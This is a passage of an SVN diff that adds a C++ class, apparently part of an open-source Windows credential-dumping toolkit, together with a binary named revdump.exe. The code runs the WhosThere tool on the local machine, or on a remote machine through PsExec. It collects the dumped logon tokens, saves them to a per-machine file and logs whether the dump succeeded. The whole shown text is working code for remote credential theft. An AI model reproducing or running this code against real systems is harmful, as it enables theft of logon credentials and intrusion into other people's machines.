+ +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +******************************************************************************/ +#include "StdAfx.h" +#include "WhosThereControl.h" +#include "Process.h" + +WhosThereControl::WhosThereControl(LONG nCacheID) +{ + m_nCacheID = nCacheID; +} + + +WhosThereControl::~WhosThereControl(void) +{ + +} + +bool WhosThereControl::Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName) +{ + char* lpszCmdLineFormat; + int nArgSize; + char* lpszStopCmdLine; + char* lpszParams; + bool result = false; + + if (lpszPipeName == NULL) + { + // Set the local WhosThere path + lpszCmdLineFormat = "%s\\%s"; + nArgSize = _scprintf(lpszCmdLineFormat, lpszDumpPath, lpszExeName); + lpszStopCmdLine = new char[nArgSize + 1]; + memset(lpszStopCmdLine, 0, nArgSize + 1); + _snprintf(lpszStopCmdLine, nArgSize, lpszCmdLineFormat, lpszDumpPath, lpszExeName); + + // Now set the parameters + lpszCmdLineFormat = " -l"; + nArgSize = strlen(lpszCmdLineFormat); + lpszParams = new char[nArgSize + 1]; + memset(lpszParams, 0, nArgSize + 1); + _snprintf(lpszParams, nArgSize, lpszCmdLineFormat); + } + else + { + lpszStopCmdLine = new char[strlen(lpszPSExecPath) + 1]; + memset(lpszStopCmdLine, 0, strlen(lpszPSExecPath) + 1); + strncpy(lpszStopCmdLine, lpszPSExecPath, strlen(lpszPSExecPath)); + + lpszCmdLineFormat = " -c -n %s %s \"%s\\%s \" -l"; + + nArgSize = _scprintf(lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName); + lpszParams = new char[nArgSize + 1]; + memset(lpszParams, 0, nArgSize + 1); + _snprintf(lpszParams, nArgSize, lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName); + } + + try + { + Process p; + + HANDLE hProcess = p.CreateProcess(lpszStopCmdLine, lpszParams); + if (hProcess != 0) + { + DWORD dwResult = WaitForSingleObject(hProcess, 1200000); // Wait 20 minutes for process to complete + if (dwResult != WAIT_OBJECT_0) + { + Log.CachedReportError(m_nCacheID, CRITICAL, "Warning: WhosThere did not complete in a timely manner - exiting"); + result = false; + } + else + { + // Read from process's output + char* szResult; + int nSize = 65535; + + szResult = new char[nSize]; + memset(szResult, 0, nSize); + p.ReadFromPipe(&szResult, nSize); + + // Was it successful? + if (strstr(szResult, "the output format is") != NULL) + { + // Success + // Write results to a file + size_t nLen = strlen(lpszMachine) + 10; // 10 chars accounts for ".whosthere" extension + char* szTempFilename = new char[nLen + 1]; + memset(szTempFilename, 0, nLen + 1); + _snprintf(szTempFilename, nLen, "%s.whosthere", lpszMachine); + + std::ofstream outputFile(szTempFilename, std::ios::out | std::ios::trunc); + outputFile.write((const char*)szResult, (DWORD)strlen(szResult)); + outputFile.close(); + delete [] szTempFilename; + Log.CachedReportError(m_nCacheID, CRITICAL, "Logon tokens dumped successfully\n", lpszMachine); + result = true; + } + else + { + // Failed + Log.CachedReportError(m_nCacheID, CRITICAL, "Failed to dump logon tokens (the text returned follows):\n%s", szResult); + result = false; + } + + delete [] szResult; + } + } + else + result = false; + } + catch(...) + { + result = false; + } + + delete [] lpszStopCmdLine; + delete [] lpszParams; + + return result; +} + Index: revdump.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Property changes on: revdump.exe ___________________________________________________________________ Added: svn:mime-type + application/octet-stream